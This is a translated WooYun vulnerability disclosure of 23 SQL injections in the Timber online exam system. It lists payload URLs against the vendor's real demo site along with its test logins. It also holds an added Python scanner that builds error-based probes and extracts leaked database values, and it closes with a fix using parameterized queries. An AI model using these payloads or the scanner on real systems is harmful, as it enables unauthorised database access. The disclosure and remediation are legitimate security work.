Vulnerability summary

Defect ID: wooyun-2015-0131622

Title: 天柏 (Timber) Online Exam System (Enterprise Edition): 23 SQL injections bundled (tested on the demo site)

Vendor: 天柏科技 (Timber Technology)

Author: goubuli

Submitted: 2015-08-07 15:43

Fixed: 2015-11-05 13:48

Published: 2015-11-05 13:48

Type: SQL injection

Severity: High

Self-assessed rank: 20

Status: handed to a third-party partner organisation (CNCERT, the National Computer Network Emergency Response Technical Team) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-08-07: Details reported to the vendor, awaiting vendor action
2015-08-07: Vendor confirmed; details visible to the vendor only
2015-08-10: Details opened to third-party security partners
2015-10-01: Details opened to core white hats and domain experts
2015-10-11: Details opened to regular white hats
2015-10-21: Details opened to intern white hats
2015-11-05: Details made public

Brief description:

As titled.
All remaining injections are bundled in this one submission.

Detailed description:

At the reviewers' request, all remaining injections are bundled in one submission.

Vendor: 上海天柏信息科技有限公司 (Shanghai Timber Information Technology Co., Ltd.)
Website: http://timber2005.com/
Customer list: http://timber2005.com/Customer.html
Official demo of the enterprise edition: http://exam1.timber2005.com
Front-end test accounts: test1, test2, test3, test4, test5, test6; password: 123456
Back-end test account: master; password: 123456

[screenshot: exam1.png]

Customer list (7783 production customers):

[screenshot: client.png]

Demo site [username/password: test1/123456]
Injection 1:

http://exam1.timber2005.com/Paper/Paper_Manage.aspx?action=view&infoid=303 and 1=user--

[screenshot: 11.png]


Injection 2:

http://exam1.timber2005.com/Paper/Paper_Type_Random_Query.aspx?return=../Paper/Paper_Query.aspx&pid=305 and 1=user--

[screenshot: 12.png]


Injection 3:

http://exam1.timber2005.com/Exam/Exam_Type_Right.aspx?infoid=35 and 1=user--

[screenshot: 13.png]


Injection 4 (the parameter sits inside two levels of parentheses, so the payload closes them first):

http://exam1.timber2005.com/Question/Question_Manage.aspx?action=view&infoid=121)) and 1=user--

Or, constructed slightly differently:

http://exam1.timber2005.com/Question/Question_Manage.aspx?action=view&infoid=121'

[screenshot: 14.png]


Injection 5:

http://exam1.timber2005.com/Question/Question_Type_Manage.aspx?action=view&infoid=3 and 1=user--

[screenshot: 15.png]


Injection 6:

http://exam1.timber2005.com/Question/Knowledge_Right.aspx?infoid=118 and 1=user--

[screenshot: 16.png]


Injection 7, GET:

http://exam1.timber2005.com/system/Position_Right.aspx?infoid=21 and 1=user--

[screenshot: 17.png]

Injection 7, POST (same page, parameter txtSearchText; the ViewState and event-validation fields below are the ones the page itself emits):

http://exam1.timber2005.com/system/Position_Right.aspx

POST body:

Position_Info1_treInfoList_ExpandState=nnnnn&Position_Info1_treInfoList_SelectedNode=&__EVENTTARGET=&__EVENTARGUMENT=&Position_Info1_treInfoList_PopulateLog=&__VIEWSTATE=%2FwEPDwUKLTkzNjcwODQ4MQ9kFgICAw9kFgQCEQ8PFgIeB1Zpc2libGVoZGQCFw9kFgICAQ88KwAJAgAPFgYeDU5ldmVyRXhwYW5kZWRkHgxTZWxlY3RlZE5vZGVkHglMYXN0SW5kZXgCBWQIFCsABgUTMDowLDA6MSwwOjIsMDozLDA6NBQrAAIWCB4EVGV4dAV26YOo6Zeo5Yqp55CGPGEgaHJlZj0nI3AnIHN0eWxlPSdtYXJnaW4tbGVmdDoxMHB4O2NvbG9yOnJlZDsnIG9uY2xpY2s9Im9rUFNCdXR0b25DbGljaygnMjEnLCfpg6jpl6jliqnnkIYnKSI%2B6YCJ5oupPC9hPh4FVmFsdWUFAjIxHghFeHBhbmRlZGceDFNlbGVjdEFjdGlvbgsqLlN5c3RlbS5XZWIuVUkuV2ViQ29udHJvbHMuVHJlZU5vZGVTZWxlY3RBY3Rpb24BZBQrAAIWCB8EBXzliqDmsrnnq5nnq5nplb88YSBocmVmPScjcCcgc3R5bGU9J21hcmdpbi1sZWZ0OjEwcHg7Y29sb3I6cmVkOycgb25jbGljaz0ib2tQU0J1dHRvbkNsaWNrKCcyNycsJ%2BWKoOayueermeermemVvycpIj7pgInmi6k8L2E%2BHwUFAjI3HwZnHwcLKwQBZBQrAAIWCB8EBXDliqDmsrnlkZg8YSBocmVmPScjcCcgc3R5bGU9J21hcmdpbi1sZWZ0OjEwcHg7Y29sb3I6cmVkOycgb25jbGljaz0ib2tQU0J1dHRvbkNsaWNrKCcyOScsJ%2BWKoOayueWRmCcpIj7pgInmi6k8L2E%2BHwUFAjI5HwZnHwcLKwQBZBQrAAIWCB8EBWrkuLvnrqE8YSBocmVmPScjcCcgc3R5bGU9J21hcmdpbi1sZWZ0OjEwcHg7Y29sb3I6cmVkOycgb25jbGljaz0ib2tQU0J1dHRvbkNsaWNrKCczNScsJ%2BS4u%2BeuoScpIj7pgInmi6k8L2E%2BHwUFAjM1HwZnHwcLKwQBZBQrAAIWCB8EBYIB5a6L5bCP5YGl55qE5bKX5L2NPGEgaHJlZj0nI3AnIHN0eWxlPSdtYXJnaW4tbGVmdDoxMHB4O2NvbG9yOnJlZDsnIG9uY2xpY2s9Im9rUFNCdXR0b25DbGljaygnMzYnLCflrovlsI%2FlgaXnmoTlspfkvY0nKSI%2B6YCJ5oupPC9hPh8FBQIzNh8GZx8HCysEAWRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBRpQb3NpdGlvbl9JbmZvMSR0cmVJbmZvTGlzdJcIgH6NkQGW%2B0oMhqZNOOfIgaCKdefVKhmgHykI%2FUqE&__VIEWSTATEGENERATOR=2622EB36&__EVENTVALIDATION=%2FwEdAAiTKBOi1XiDcXqUyV0SdyyXCfx%2BkHEsT%2Fq9JPrYUB%2BFFI7U3Vc0WZ%2BwxclqyPFfzmMGIljHegnqMccwcDBMgXY0WdwgR1KTjj%2Bb0f5EAac9YA3v4Ugp0DQCfDrVLkSvFLBnX1WvhHdrUgu82frszIAAF6nUgwMmppERt%2BrhodW6ghMy2CWvx%2Fwdyj0dvZFsVZ1LADeRpsvN6ySapYML0u7n&txtSearchText=12' and 1=user--&btnSearch=%E6%9F%A5%E8%AF%A2&P_PNAME=%24%E6%A0%B9%E8%8A%82%E7%82%B9&P_NAME=&P_SORT=&P_MARK=&P_PID=


[screenshot: 17_1.png]


Injection 8:

http://exam1.timber2005.com/system/Dep_Right.aspx?infoid=87 and 1=user--

[screenshot: 18.png]


Injection 9 (a lone single quote in examkey is enough to trigger the error):

http://exam1.timber2005.com/exam/New_User_Exam_Single.aspx?wkey=SJ&planid=217&planname=231&time=10000&point=100&passpoint=60&module=%C3%A5%C2%8D%C2%95%C3%A5%C2%8D%C2%B7&pid=169&examkey='&ktypeid=&isanswer=%C3%A4%C2%B8%C2%8D%C3%A6%C2%98%C2%BE%C3%A7%C2%A4%C2%BA&return=User_Test_Query.aspx

[screenshot: 19.png]


Injection 10:

http://exam1.timber2005.com/exam/User_Test.aspx?wkey=GDSJ&planid=194&planname=df&time=10000&point=100&passpoint=60&module=%E6%95%B4%E5%8D%B7&pid=210&examkey='and 1=db_name()--&ktypeid=&isanswer=%E4%B8%8D%E6%98%BE%E7%A4%BA&return=User_Test_Query.aspx

[screenshot: 20.png]


Injection 11:

http://exam1.timber2005.com/exam/Labor_Exam_View.aspx?wkey=SJ&planid=256&planname=test&time=120&point=100&passpoint=60&module=%C3%A6%C2%95%C2%B4%C3%A5%C2%8D%C2%B7&pid=165&username=test1&usercnname=1&examkey=0424056D6B0A42A6A7' and 1=user--&userid=101&pager=1&resulturl=User_Exam_History_Query.aspx

[screenshot: 21.png]


Injection 12:

http://exam1.timber2005.com/exam/User_Exam_History_Card.aspx?examkey=29C04A631EDE4A21A8' and 1=@@version--

[screenshot: 22.png]


Injection 13:

http://exam1.timber2005.com/exam/User_Exam.aspx?wkey=GDSJ&planid=183 and 1=user--&planname=aaaaaaaaaaaaaaaaaaaaaaaa&time=100&point=20&passpoint=10&module=整卷&pid=198&examkey=4A7EF070347E4E8985&return=User_Exam_Reset_Query.aspx

[screenshot: 23.png]


The findings I submitted separately this morning were sent back with a request to bundle them into one report, which makes submitting rather tiring...
Today's findings are in the enterprise edition, which should have more users than the standard edition.



Demo site [username/password: master/123456]
Injection I:

File: User_Error_Exam.aspx
Parameter: pid

URL:

http://exam1.timber2005.com/exam/User_Error_Exam.aspx?wkey=GDSJ&planid=183&planname=&time=100&point=20&passpoint=10&module=%E6%95%B4%E5%8D%B7&pid=198 and 1=user&username=master&usercnname=master1&examkey=14B2DD51FF54486AB2&userid=61

[screenshot: 1.png]


Injection II:

File: Vote_Result_View.aspx
Parameter: infoid

URL:

http://exam1.timber2005.com/Info/Vote_Result_View.aspx?return=Vote_User.aspx&action=edit&infoid=9 and 1=user

[screenshot: 2.png]


Injection III:

File: Vote_User_Join.aspx
Parameter: infoid

URL:

http://exam1.timber2005.com/Info/Vote_User_Join.aspx?infoid=9 and 1=user

[screenshot: 3.png]


Injection IV:

File: Vote_Manage.aspx
Parameter: infoid

URL:

http://exam1.timber2005.com/Info/Vote_Manage.aspx?action=view&infoid=9 and 1=user

[screenshot: 4.png]


Injection V:

File: Vote_Sub_Manage.aspx
Parameter: infoid

URL:

http://exam1.timber2005.com/Info/Vote_Sub_Manage.aspx?infoid=9 and 1=user

[screenshot: 5.png]


Injection VI:

File: Test_Manage.aspx
Parameter: infoid

URL:

http://exam1.timber2005.com/Exam/Test_Manage.aspx?action=view&infoid=215 and 1=user

[screenshot: 6.png]


Injection VII:

File: Exam_Persitence.aspx
Parameter: infoid

URL:

http://exam1.timber2005.com/Exam/Exam_Persitence.aspx?action=limit&infoid=217 and 1=user&type=2

[screenshot: 7.png]


Injection VIII:

File: Plan_Manage.aspx
Parameter: infoid

URL:

http://exam1.timber2005.com/Exam/Plan_Manage.aspx?action=view&infoid=260 and 1=user

[screenshot: 8.png]


Injection IX:

File: Exam_Result_Role_Sub.aspx
Parameter: roleid

URL:

http://exam1.timber2005.com/Exam/Exam_Result_Role_Sub.aspx?roleid=1 and 1=user--

[screenshot: 9.png]

http://exam1.timber2005.com/Exam/Exam_Result_Role_Sub.aspx?roleid=1'

[screenshot: 9_1.png]


Injection X:

File: Exam_Persitence.aspx
Parameter: infoid (a different code path from Injection VII, reached with type=1)

URL:

http://exam1.timber2005.com/Exam/Exam_Persitence.aspx?action=limit&infoid=265 and 1=user--&type=1

[screenshot: 10.png]


================================
Bonus: physical path disclosure
Visit:

http://exam1.timber2005.com/exam/User_Error_Exam.aspx?wkey=GDSJ&planid=183&planname=aaaaaaaaaaaaaaaaaaaaaaaa&time=100&point=20&passpoint=10&module=%E6%95%B4%E5%8D%B7&pid=198&username=master&usercnname=master1&examkey=14B2DD51FF54486AB2'&userid=61

Appending a single quote to the examkey parameter produces

[screenshot: 1_1.png]

Path (the quote from the payload is carried into the file name, so examkey is also used unchecked to build a file system path):

D:\公司演示网站\V2014.09.01\考试系统企业版\compiled_web\UpLoad\ExamPaper\183\14B2DD51FF54486AB2'.exam


My hands are worn out.

Proof of vulnerability:

Proven above. Taking one of the URLs to demonstrate retrieving other data:
1. Database name

http://exam1.timber2005.com/Info/Vote_Sub_Manage.aspx?infoid=9 and 1=db_name()--

[screenshot: 10_1.png]

2. Machine name

http://exam1.timber2005.com/Info/Vote_Sub_Manage.aspx?infoid=9 and 1=host_name()--

[screenshot: 10_2.png]

The rest are not demonstrated one by one.
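Every probe in this report works the same way: on SQL Server, user, db_name(), host_name() and @@version return character data, and comparing them with the integer 1 forces an implicit cast that fails, so the ASP.NET error page echoes the value inside the exception text. The Python script below is an added example, not code from the report or from the vendor. It builds the three payload shapes seen above (a numeric parameter, a quoted string parameter, and a parameter that first has to close enclosing parentheses, as in Question_Manage.aspx), parses the cast error out of an error page, and runs the probes through an injected transport. The sample error page and the simulated_fetch transport are constructed stand-ins, not captures from exam1.timber2005.com; the regular expressions match the standard SQL Server wording for this error in the 2005+ and 2000 versions.

```python
import html
import re

# Character-valued expressions in MSSQL. Comparing any of them with the
# integer 1 forces an implicit cast of the value to int, which fails and
# echoes the value inside the error message (this is what the report's
# "and 1=user--" probes rely on).
PROBES = {
    "user": "user",          # current database user, e.g. dbo
    "db": "db_name()",       # current database name
    "host": "host_name()",   # host name as seen by SQL Server
    "version": "@@version",  # server build string
}

# Cast-error wording for SQL Server 2005+ and for SQL Server 2000.
ERROR_PATTERNS = [
    re.compile(r"Conversion failed when converting the n?varchar value "
               r"'(?P<v>[^']*)' to data type int"),
    re.compile(r"Syntax error converting the n?varchar value "
               r"'(?P<v>[^']*)' to a column of data type int"),
]


def build_probe_url(url, param, probe="user", context="int", close_parens=0):
    """Return `url` with `param` turned into an error-based probe.

    context="int"  -> numeric parameter, payload appended directly
                      (Paper_Manage.aspx: infoid=303 and 1=user--)
    context="str"  -> quoted string parameter, a single quote closes it first
                      (User_Exam_History_Card.aspx: examkey=...' and 1=@@version--)
    close_parens   -> number of ')' needed to escape an enclosing expression
                      (Question_Manage.aspx needed two: infoid=121)) and 1=user--)
    The query string is handled as raw text so pre-encoded values such as
    module=%E6%95%B4%E5%8D%B7 pass through untouched.
    """
    base, _, query = url.partition("?")
    pairs = [p.split("=", 1) if "=" in p else [p, ""] for p in query.split("&") if p]
    hit = False
    for pair in pairs:
        if pair[0] == param:
            hit = True
            quote = "'" if context == "str" else ""
            pair[1] = f"{pair[1]}{quote}{')' * close_parens} and 1={PROBES[probe]}--"
    if not hit:
        raise KeyError(f"parameter {param!r} not present in {url}")
    return base + "?" + "&".join(f"{k}={v}" for k, v in pairs)


def extract_leak(body):
    """Pull the leaked value out of an ASP.NET error page, or return None.

    The yellow-screen page HTML-encodes the exception text (newer .NET
    versions emit ' as &#39;), so the body is unescaped before matching.
    """
    text = html.unescape(body)
    for pat in ERROR_PATTERNS:
        m = pat.search(text)
        if m:
            return m.group("v")
    return None


def scan(targets, fetch, probe="user"):
    """Probe every (url, param, context, close_parens) tuple in `targets`.

    `fetch` is a callable url -> response body; injecting it keeps the
    transport out of this module so the scan can run against a recorded or
    simulated server. Returns {probe_url: leaked_value_or_None}.
    """
    results = {}
    for url, param, context, close_parens in targets:
        probe_url = build_probe_url(url, param, probe, context, close_parens)
        results[probe_url] = extract_leak(fetch(probe_url))
    return results


# Three injection points taken from the report, one per payload shape.
TARGETS = [
    ("http://exam1.timber2005.com/Paper/Paper_Manage.aspx?action=view&infoid=303",
     "infoid", "int", 0),
    ("http://exam1.timber2005.com/Question/Question_Manage.aspx?action=view&infoid=121",
     "infoid", "int", 2),
    ("http://exam1.timber2005.com/exam/User_Exam_History_Card.aspx?examkey=29C04A631EDE4A21A8",
     "examkey", "str", 0),
]

# Constructed stand-in for the ASP.NET error page; not a capture from the demo site.
SAMPLE_ERROR_PAGE = (
    "<html><body><h1>Server Error in '/' Application.</h1>"
    "<h2><i>Conversion failed when converting the nvarchar value &#39;dbo&#39; "
    "to data type int.</i></h2></body></html>"
)


def simulated_fetch(url):
    """Offline transport: answer probes with the cast error, anything else normally."""
    return SAMPLE_ERROR_PAGE if " and 1=" in url else "<html><body>OK</body></html>"


if __name__ == "__main__":
    for probe_url, leak in scan(TARGETS, simulated_fetch).items():
        print(f"{'LEAK ' + leak if leak else 'clean'}: {probe_url}")
```

Against a live target the fetch callable would be an HTTP client that sends the request with the test1 or master session cookie, since all of these pages sit behind a login; the parsing and payload logic stay the same.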

Fix recommendation:

Filter input. Filtering alone is not a reliable fix, though: bind every request value through parameterized queries (SqlCommand with SqlParameter), convert numeric ids such as infoid, pid, planid and roleid to int before they reach the query, and disable detailed error pages so that cast errors and physical paths such as the one above are no longer echoed to the client.
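To show why keyword filtering is not the fix, here is an added Python example; it is not the vendor's code. The exam system is ASP.NET on SQL Server and its schema is not public, so the two tables and their columns are hypothetical and sqlite3 stands in for the database. It pairs the string-concatenation pattern behind the findings with the parameterized form, using the report's own payloads as input. On sqlite the probe fails with an unknown-column error rather than SQL Server's cast error, but the point is the same: in the concatenated version the payload reaches the SQL parser, in the fixed version it is either rejected up front or treated as plain data.

```python
import sqlite3

# Constructed in-memory stand-in for two of the endpoints in the report:
#   Vote_Sub_Manage.aspx?infoid=9              (numeric id)
#   User_Exam_History_Card.aspx?examkey=...    (string key)
# The exam system's real schema is not public; these tables are hypothetical.
SCHEMA = """
CREATE TABLE vote_sub (infoid INTEGER PRIMARY KEY, title TEXT);
INSERT INTO vote_sub VALUES (8, 'Q1 survey');
INSERT INTO vote_sub VALUES (9, 'Q2 survey');
INSERT INTO vote_sub VALUES (10, 'HR survey');
CREATE TABLE exam_history (examkey TEXT PRIMARY KEY, userid INTEGER, score INTEGER);
INSERT INTO exam_history VALUES ('29C04A631EDE4A21A8', 101, 88);
INSERT INTO exam_history VALUES ('4A7EF070347E4E8985', 61, 95);
"""


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


# --- the pattern behind the 23 findings: request values pasted into SQL text ---

def vote_sub_vulnerable(conn, infoid):
    """Numeric id concatenated unquoted: '9 or 1=1' rewrites the WHERE clause."""
    sql = f"SELECT infoid, title FROM vote_sub WHERE infoid={infoid}"
    return conn.execute(sql).fetchall()


def exam_history_vulnerable(conn, examkey):
    """String key concatenated inside quotes: a single quote closes the literal."""
    sql = f"SELECT examkey, userid, score FROM exam_history WHERE examkey='{examkey}'"
    return conn.execute(sql).fetchall()


# --- the fix: validate the type, then bind the value as a parameter ---

def vote_sub_fixed(conn, infoid):
    """Ids are integers, so anything that is not one is rejected before any SQL runs."""
    try:
        infoid = int(infoid)          # "9 and 1=user--" fails here
    except (TypeError, ValueError):
        raise ValueError("infoid must be an integer") from None
    sql = "SELECT infoid, title FROM vote_sub WHERE infoid=?"
    return conn.execute(sql, (infoid,)).fetchall()


def exam_history_fixed(conn, examkey):
    """Bound parameters travel as data, never as SQL text, so a quote in the
    value cannot close the string literal; an unknown key simply matches nothing."""
    sql = "SELECT examkey, userid, score FROM exam_history WHERE examkey=?"
    return conn.execute(sql, (examkey,)).fetchall()


def run(fn, conn, value):
    """Execute fn and report the outcome as a comparable tuple."""
    try:
        return ("rows", fn(conn, value))
    except sqlite3.Error as e:
        return ("sql_error", str(e))
    except ValueError as e:
        return ("rejected", str(e))


if __name__ == "__main__":
    db = open_db()
    for label, fn, value in [
        ("vulnerable, honest id ", vote_sub_vulnerable, "9"),
        ("vulnerable, or 1=1    ", vote_sub_vulnerable, "9 or 1=1"),
        ("vulnerable, report's  ", vote_sub_vulnerable, "9 and 1=user--"),
        ("fixed, report's       ", vote_sub_fixed, "9 and 1=user--"),
        ("vulnerable, examkey   ", exam_history_vulnerable, "29C04A631EDE4A21A8' and 1=user--"),
        ("fixed, examkey        ", exam_history_fixed, "29C04A631EDE4A21A8' and 1=user--"),
    ]:
        print(label, run(fn, db, value))
```

The same split applies to the path-disclosure finding: the examkey value is also used to build a file name, so it needs its own allow-list check (the keys on the demo site are 18 hexadecimal characters) before it touches the file system.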

Copyright notice: please credit goubuli@WooYun when reposting.


Vendor response

Vendor reply:

Severity: High

Rank: 12

Confirmed: 2015-08-07 13:47

Vendor comment:

CNVD confirmed the reported issue and has notified the software vendor (or site operator) by email (and telephone) through its public contact channels; the vendor will provide a fix and coordinate remediation with the affected customer organisations.

Latest status:

None